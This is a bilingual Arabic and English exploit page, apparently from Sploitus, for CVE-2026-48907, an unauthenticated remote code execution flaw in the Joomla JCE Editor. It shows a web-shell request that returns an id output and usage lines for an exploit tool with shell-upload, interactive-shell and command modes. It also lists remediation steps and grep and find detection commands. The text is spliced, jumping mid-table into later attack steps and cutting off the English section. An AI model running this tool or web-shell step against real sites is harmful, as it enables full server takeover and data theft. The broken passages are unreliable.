Share
## https://sploitus.com/exploit?id=74A39151-6177-5F8E-882E-5886E4BF188D
# ─── CVE-2026-48907 ───








# 🏴 AMN SECURITY 🏴

### مركز أبحاث الأمن السيبراني | Cyber Security Research Center

[![Website](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/)
[![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw)
[![Email](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)

---











# ⚠️ ثغرة تنفيذ أوامر عن بُعد في إضافة JCE Editor لـ Joomla
### CVE-2026-48907 | CVSS 9.8 | حرجة جداً (CRITICAL)

---

### 📋 الملخص التنفيذي

ثغرة أمنية خطيرة جداً في إضافة **JCE Editor** (النمط JCE — Joomla Content Editor) لنظام إدارة المحتوى **Joomla**، تسمح لمهاجم غير مُصادق (بدون تسجيل دخول) بإنشاء ملفات تعريف محرر جديدة، مما يؤدي في النهاية إلى رفع وتنفيذ كود PHP ضار على الخادم المستهدف.

هذه الثغرة مصنفة بـ **CVSS 9.8 (Critical)**، وتسمح باستيلاء كامل على موقع Joomla دون الحاجة إلى أي صلاحيات مسبقة. تم إصلاح الثغرة في الإصدارات **Joomla 5.1.6** و **Joomla 4.4.11**.

| العنصر | التفاصيل |
|--------|----------|
| **CVE** | CVE-2026-48907 |
| **CVSS v3.1** | 9.8 (Critical) |
| **المتجه** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **النوع** | Unauthenticated Remote Code Execution |
| **المنتج** | Joomla! CMS (إضافة JCE Editor) |
| **الإصدارات المتأثرة** | Joomla 4.x 
--boundary--
```

#### الخطوة 3: تنفيذ الأوامر

```
GET /media/com_jce/shell.php?cmd=id HTTP/1.1
Host: target-joomla.com

→ uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

---

### 🖥️ استخدام الأداة

```bash
# فحص الهدف
python3 CVE-2026-48907.py -t https://target-joomla.com --check

# استغلال كامل مع رفع Web Shell
python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php

# وضع شيل تفاعلي
python3 CVE-2026-48907.py -t https://target-joomla.com --interactive

# عبر بروكسي
python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080

# تنفيذ أمر مباشر
python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id"
```

#### الخيارات المتاحة

| الخيار | الوصف |
|--------|-------|
| `-t, --target` | رابط موقع Joomla المستهدف |
| `--check` | فحص وجود الثغرة فقط |
| `--exploit` | استغلال الثغرة ورفع Web Shell |
| `-o, --output` | اسم ملف Web Shell الناتج |
| `--interactive` | وضع شيل تفاعلي |
| `-c, --command` | تنفيذ أمر مباشر |
| `--proxy` | بروكسي HTTP لتصحيح الأخطاء |
| `--profile-name` | اسم ملف التعريف (اختياري) |
| `--verbose, -v` | إظهار تفاصيل إضافية |

---

### 🛡️ الإجراءات العلاجية

| الإجراء | الأولوية | الوصف |
|---------|----------|-------|
| **تحديث Joomla** | 🟢 فوري | تحديث Joomla إلى 5.1.6 أو 4.4.11 |
| **تعطيل JCE Editor** | 🟢 مؤقتاً | تعطيل الإضافة لحين التحديث |
| **تدقيق ملفات التعريف** | 🟡 مهم | مراجعة وحذف أي ملفات تعريف غير مصرح بها |
| **فحص الملفات المرفوعة** | 🟡 مهم | البحث عن ملفات PHP خبيثة في media/com_jce/ |
| **مراجعة السجلات** | 🔵 مستمر | تدقيق سجلات الخادم بحثاً عن نشاط مشبوه |

#### أوامر فحص سريعة

```bash
# البحث عن ويب شيلز
find /var/www/html -name "*.php" -newer /var/www/html/configuration.php

# فحص السجلات
grep -r "com_jce" /var/log/apache2/access.log | grep -i "shell\|cmd\|system"

# التحقق من الإصدار
grep -r "JCE" /var/www/html/administrator/manifests/files/joomla.xml
```

---

### 📊 تقييم التأثير

| المجال | التأثير |
|--------|---------|
| **السرية (Confidentiality)** | 🔴 اختراق كامل — يمكن قراءة جميع البيانات |
| **السلامة (Integrity)** | 🔴 اختراق كامل — يمكن تعديل جميع البيانات |
| **التوفر (Availability)** | 🔴 اختراق كامل — يمكن تعطيل الموقع |
| **صعوبة الاستغلال** | 🟢 منخفضة — لا يتطلب صلاحيات أو معرفة متقدمة |
| **اكتشاف الهجوم** | 🟡 متوسط — يمكن اكتشافه في السجلات |

---

### 🔗 المراجع

- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907
- **Joomla Release**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html
- **JCE Editor**: https://www.joomlacontenteditor.net/
- **CWE-94**: Improper Control of Generation of Code (Code Injection)

> ⚠️ **إخلاء مسؤولية**: هذا التقرير لأغراض تعليمية وبحثية فقط. استخدام هذه المعلومات لأغراض غير قانونية يتحمل المستخدم مسؤوليته بالكامل.

---

### 🔗 تواصل مع AMN SECURITY

[![Website](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/)
[![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw)
[![Email](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)



---







# ⚠️ CVE-2026-48907 — Joomla JCE Editor Unauthenticated Remote Code Execution

### CVSS 9.8 | CRITICAL | Remote Code Execution

---

### Executive Summary

**CVE-2026-48907** is a critical unauthenticated Remote Code Execution (RCE) vulnerability in the **JCE Editor** extension for **Joomla CMS**. This vulnerability allows attackers without any authentication to create new editor profiles and ultimately upload and execute arbitrary PHP code on the target server.

The vulnerability has been assigned a **CVSS score of 9.8 (Critical)** and allows complete compromise of Joomla websites. It was patched in **Joomla 5.1.6** and **Joomla 4.4.11**.

| Field | Value |
|-------|-------|
| **CVE** | CVE-2026-48907 |
| **CVSS v3.1** | 9.8 (Critical) |
| **Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| **Type** | Unauthenticated Remote Code Execution |
| **Product** | Joomla CMS (JCE Editor Extension) |
| **Affected Versions** | Joomla 4.x  ⚠️ **Disclaimer**: This report is for educational and research purposes only. Unauthorized use of this information is illegal and the user bears full responsibility.